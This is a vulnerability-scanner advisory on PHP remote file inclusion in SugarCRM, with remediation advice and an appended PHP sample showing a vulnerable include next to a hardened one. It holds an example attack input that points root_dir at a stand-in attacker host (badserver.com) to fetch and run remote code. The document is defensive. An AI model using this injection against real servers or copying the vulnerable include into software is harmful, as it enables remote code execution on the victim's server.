504807 : Script Allows PHP Injection (SugarCRM)

Risk 5 : Web Services

Remote attackers may be able to execute arbitrary PHP commands on the web server.

PHP (Hypertext Preprocessor) is a scripting language used for web development. PHP scripts can be embedded into HTML files, and are run by the web server when the file is requested by a web browser.

Some PHP scripts do not adequately control important variables such as the directory path to supporting scripts. A remote attacker is able to manipulate these variables by sending specially crafted HTTP requests, thereby allowing the attacker to run arbitrary PHP scripts.

For example, a PHP script may include the following code: include($root_dir . 'common.php'); and the default value of the variable $root_dir may be /var/www/php/ (with a trailing slash, since the value is concatenated directly with the file name). In this case, the PHP processor should execute the script /var/www/php/common.php within the current script.

Now suppose an attacker who owns a web server called badserver.com requests the script with the input parameter root_dir=http://badserver.com/ and the script accepts that value for $root_dir. In this case, the PHP processor would fetch and execute the script http://badserver.com/common.php. The attacker could thus execute arbitrary code on the vulnerable server simply by placing the code in the common.php file on his or her own server.

For more information on this and other PHP scripting vulnerabilities, see [http://www.phpadvisory.com/articles/view.phtml?ID=5] On the Security of PHP by Jordan Dimov and [http://www.securityfocus.com/archive/1/218000] Bugtraq.

For more information on specific PHP injection vulnerabilities see the following advisories:

[http://archives.neohapsis.com/archives/fulldisclosure/2005-01/0115.html] SugarCRM


To fix this problem, all PHP scripts should properly initialize directory paths and other important constants before use, so they cannot be manipulated by attackers. Setting register_globals to off in the php.ini file may also protect against certain PHP injection vulnerabilities, because request parameters are then no longer turned into script variables automatically. For fix information on specific products, see the appropriate advisory referenced above. Note that in many of the affected software products, the same problem lies in more than one script, even if only one is reported here.
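The include pattern described above, first in the vulnerable form and then hardened along the lines of the fix just stated, as an added example that is not code from the SugarCRM advisory or from the product itself; the /var/www/php/ install path, the module names and the `module` request parameter are assumed for illustration.

```php
<?php
// Added example: vulnerable include beside its hardened form.

// --- Vulnerable form (the pattern the advisory describes) -----------------
// With register_globals=on, a request containing
// ?root_dir=http://badserver.com/ silently defines $root_dir before this
// line runs, so the include fetches and executes a remote common.php.
function vulnerable_include()
{
    global $root_dir;                       // may have come from the request
    include($root_dir . 'common.php');
}

// --- Hardened form -------------------------------------------------------
// 1. The directory is a constant fixed in the script, never a variable
//    that a request can populate (the fix the advisory recommends).
// 2. Where a caller may choose among modules, the choice is checked
//    against a fixed list and resolved with realpath(), so neither a URL
//    nor a ../ sequence can escape the intended directory.
define('ROOT_DIR', '/var/www/php/');        // assumed install path

function safe_include(string $module): bool
{
    $allowed = ['common', 'util'];          // fixed list of local modules
    if (!in_array($module, $allowed, true)) {
        return false;                       // unknown module: refuse
    }
    $base = realpath(ROOT_DIR);
    $path = realpath(ROOT_DIR . $module . '.php');
    // realpath() yields false for a URL or a missing file; the prefix
    // check rejects anything that resolved outside ROOT_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    include $path;
    return true;
}

// Input is read from one named parameter only; ROOT_DIR itself is never
// derived from the request.
$module = $_GET['module'] ?? 'common';
if (!safe_include($module)) {
    http_response_code(400);
    exit('invalid module');
}
```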

Saint Corporation : 2010-04-14